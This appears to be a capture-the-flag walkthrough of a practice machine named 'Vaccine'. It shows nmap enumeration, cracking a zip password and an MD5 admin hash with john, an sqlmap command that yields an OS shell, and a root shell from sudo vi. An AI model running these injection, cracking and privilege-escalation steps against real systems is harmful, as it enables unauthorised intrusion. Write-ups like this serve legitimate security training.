Vaccine

Personal Rating: Very Easy

Enumeration

After a first nmap scan, those ports seem open:

sudo nmap -sV <IP>

22(ssh, OpenSSH 8.0p1 Ubuntu 6build1)
21(ftp, vsftpd 3.0.3)
80(http, pache httpd 2.4.41)

Hash Cracking

With anonymous ftp login I could obtain the file backup.zip. It was encrypted and I bruteforced the password using john:

unzip -l
    index.php style.css
zip2john backup.zip > backup.zip.john
john --wordlist:/home/parrot/Documents/Pentesting/rockyou.txt backup.zip.hash
john --show backup.zip.hash
    backup.zip:741852963::backup.zip

Checking the files inside, the PHP file contained the following:

admin
md5($_POST['password']) === "2cb<SNIP>bd3"

I cracked the hash, it resulted to qwerty789

I logged in with those credentials at the webpage.

Automated SQLi

On the page there was a search field. I tried several injection types, but my tests didn't yield results. But an sqlmap scan did:

sqlmap -v 6 --cookie="PHPSESSID=c0nip48t92u61pie4o4grhueg9" -a --level=5 --os-shell --os-pwn -u 'http://10.10.10.46'

GET parameter 'search' is vulnerable

With sqlmap I could directly get an os shell.

GTFOBin vi

Searching for GTFObins yielded a quick result:

sudo -l
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

I executed the command with sudo to open the file with vi as root. vi can execute commands when opened, so I did just that:

:!/bin/bash

With that a root shell was started.